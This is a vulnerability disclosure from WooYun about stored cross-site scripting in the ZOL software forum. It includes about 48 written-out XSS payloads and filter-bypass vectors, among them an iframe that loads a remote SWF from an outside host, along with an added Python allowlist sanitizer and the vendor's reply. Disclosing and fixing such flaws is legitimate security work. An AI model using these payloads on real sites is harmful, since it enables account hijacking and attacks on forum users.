Vulnerability summary

Defect ID: wooyun-2013-037263

Title: Stored XSS in the ZOL (中关村在线) software forum

Affected vendor: ZOL (中关村在线)

Author: mramydnei

Submitted: 2013-09-16 10:59

Fix time: 2013-10-31 11:00

Disclosed: 2013-10-31 11:00

Vulnerability type: XSS (cross-site scripting)

Severity: Medium

Self-assessed Rank: 10

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-09-16: Details sent to the vendor, awaiting vendor handling
2013-09-16: Vendor confirmed; details visible to the vendor only
2013-09-26: Details disclosed to core white hats and domain experts
2013-10-06: Details disclosed to regular white hats
2013-10-16: Details disclosed to intern white hats
2013-10-31: Details disclosed to the public

Summary:

Insufficient filtering.

Details:

Insufficient filtering allows malicious XSS code to be injected by intercepting and modifying the request.

[screenshot: zol1.jpg]

Proof of concept:

[screenshot: zol2.jpg]

Remediation:

Because several XSS vectors were inserted at once during testing, it is not certain whether there is no filtering at all or whether the regex was simply thrown off by the combination.
Below are the vectors I normally use for XSS testing, so reviewers can reproduce the scenario; ZOL can also use them as a reference when fixing the vulnerability.

<script>alert((+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]])</script>
<script>alert([!![]]+[])</script>
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script>
<script>prompt(-[])</script>
<script firefox>alert(1)</script>
<SCRIPT>+alert("2")</SCRIPT>
<script>alert(/3/)</script>
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/4/)></script>
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(5)></script> ?
<script>alert(String.fromCharCode(49))</script>
<script>alert(/7/.source)</script>
<script>setTimeout('alert(8)',0)</script>
<button/onclick=alert(9) >KCF</button>
<form><button formaction=javascript&colon;alert(10)>CLICKME
<a href=javascript:confirm(11)>asd</a>
<a onmouseover=(alert(12))>KCF</a>
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(13)>ClickMe
<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(14)"><rect width="1000" height="1000" fill="white"/></a> </svg>
<p/onmouseover=javascript:alert(15); >KCF</p>
<img src=x onerror=alert(16)>
<img src ?itworksonchrome?\/onerror = alert(17)>
<img src=x onerror=window.open('http://18.com');>
<img/src/onerror=alert(19)>
<img src="x:kcf" onerror="alert(20)">
<body/onload=alert(21)>
<body onscroll=alert(22)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
<body oninput=alert(23)><input autofocus>
<var onmouseover="prompt(24)">KCF</var>
<div/onmouseover='alert(25)'>X
<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;26&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;29&Tab;%29></iframe>
<iframe SRC="http://0x.lv/xss.swf"></iframe>
<IFRAME SRC="javascript:alert(27);"></IFRAME>
<meta http-equiv="refresh" content="0;javascript&colon;alert(28)"/>?
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E">
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
<marquee onstart="alert('31')"></marquee>
<isindex type=image src=1 onerror=alert(32)>
<isindex action=javascript:alert(33) type=image>
<input onfocus=javascript:alert(34) autofocus>
<input onblur=javascript:alert(35) autofocus><input autofocus>
<select onfocus=javascript:alert(36) autofocus>
<textarea onfocus=javascript:alert(37) autofocus>
<keygen onfocus=javascript:alert(38) autofocus>
<FRAMESET><FRAME SRC="javascript:alert(39);"></FRAMESET>
<frameset onload=alert(40)>
<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCg0MSk8L3NjcmlwdD4="></embed>
<embed src=javascript:alert(42)>
<svg onload="javascript:alert(43)" xmlns="http://www.w3.org/2000/svg"></svg>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(44)"></g></svg>
<math href="javascript:javascript:alert(45)">CLICKME</math>
<video><source onerror="alert(46)">
<audio src=x onerror=alert(47)>
<video src=x onerror=alert(48)>


Thanks for your work.
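The vendor's note that it "cannot block all tags completely" and the author's guess that the regex was thrown off both point at the same root cause: a blacklist regex over user HTML is not a fix. The example below is added here and is not code from the report or from ZOL. It shows the defender-side alternative: parse the post with Python's standard `html.parser`, keep only an allowlist of harmless tags and attributes, re-escape all text, and accept `href` only when it is an absolute http(s) URL after entity decoding and whitespace stripping (the entity-encoded and `&Tab;`/`&NewLine;`-padded `javascript:` vectors above are exactly what the last two steps neutralize). The allowlist contents are an assumption for a forum post; a real deployment would size it to the formatting the forum actually needs.

```python
"""Allowlist HTML sanitizer for user-supplied forum posts (added example).

Assumptions (not from the report): a forum post may contain only the tags in
ALLOWED_TAGS, and links may only point at absolute http(s) URLs.
"""
import html
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "strong", "em", "br", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on* handlers, no style, no src
VOID_TAGS = {"br"}
_CTRL_OR_WS = re.compile(r"[\x00-\x20]")  # browsers strip these inside URLs


def safe_url(value: str) -> bool:
    """Accept only absolute http(s) URLs.

    html.parser already decodes entities (&#97; &colon; &Tab; ...), so by the
    time we see the value, 'j&#97v&#97script&#x3A;' is 'javascript:'.  Tabs and
    newlines are removed before the check because browsers ignore them in URLs.
    """
    cleaned = _CTRL_OR_WS.sub("", value).lower()
    return cleaned.startswith(("http://", "https://"))


class Sanitizer(HTMLParser):
    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []
        self.open_tags: list[str] = []    # stack so output stays balanced

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:        # unknown/dangerous tag: drop it,
            return                         # its text content is still emitted
        parts = [tag]
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                   # drops onerror=, onmouseover=, ...
            value = value or ""
            if name == "href" and not safe_url(value):
                continue                   # drops javascript:/data: links
            parts.append(f'{name}="{html.escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ">")
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)

    def handle_endtag(self, tag):
        if tag not in self.open_tags:
            return
        while True:                        # close any tags left open inside
            top = self.open_tags.pop()
            self.out.append(f"</{top}>")
            if top == tag:
                break

    def handle_data(self, data):
        # Text is always re-escaped, so "<script>" typed as text stays text.
        self.out.append(html.escape(data, quote=True))

    # Comments, doctype and processing instructions carry no forum content.
    def handle_comment(self, data):
        pass

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass


def sanitize(fragment: str) -> str:
    """Return a version of `fragment` containing only allowlisted markup."""
    parser = Sanitizer()
    parser.feed(fragment)
    parser.close()
    for tag in reversed(parser.open_tags):  # close whatever the input left open
        parser.out.append(f"</{tag}>")
    return "".join(parser.out)


if __name__ == "__main__":
    # Constructed sample post mixing legitimate markup with vectors from above.
    sample = ('<p>hello <a href="http://example.com/">link</a></p>'
              '<img src=x onerror=alert(16)>'
              '<a href=j&#97v&#97script&#x3A;&#97lert(13)>ClickMe</a>')
    print(sanitize(sample))
```

For fields that should never contain markup at all (usernames, titles), skip the parser and call `html.escape` on the whole value at render time; the sanitizer is only for the one field where limited formatting is a requirement. Note that `<script>` bodies survive as plain escaped text, which is harmless, and that the parser decodes entities before the attribute checks run, so encoding tricks do not reach the browser as a live URL.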

Copyright notice: please credit the source when reposting, mramydnei@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 5

Confirmed: 2013-09-16 11:07

Vendor reply:

I'll go discuss this with the person in charge. This issue was discussed with them before; it is not possible to block all tags completely. Thanks for the submission.

Latest status:

None yet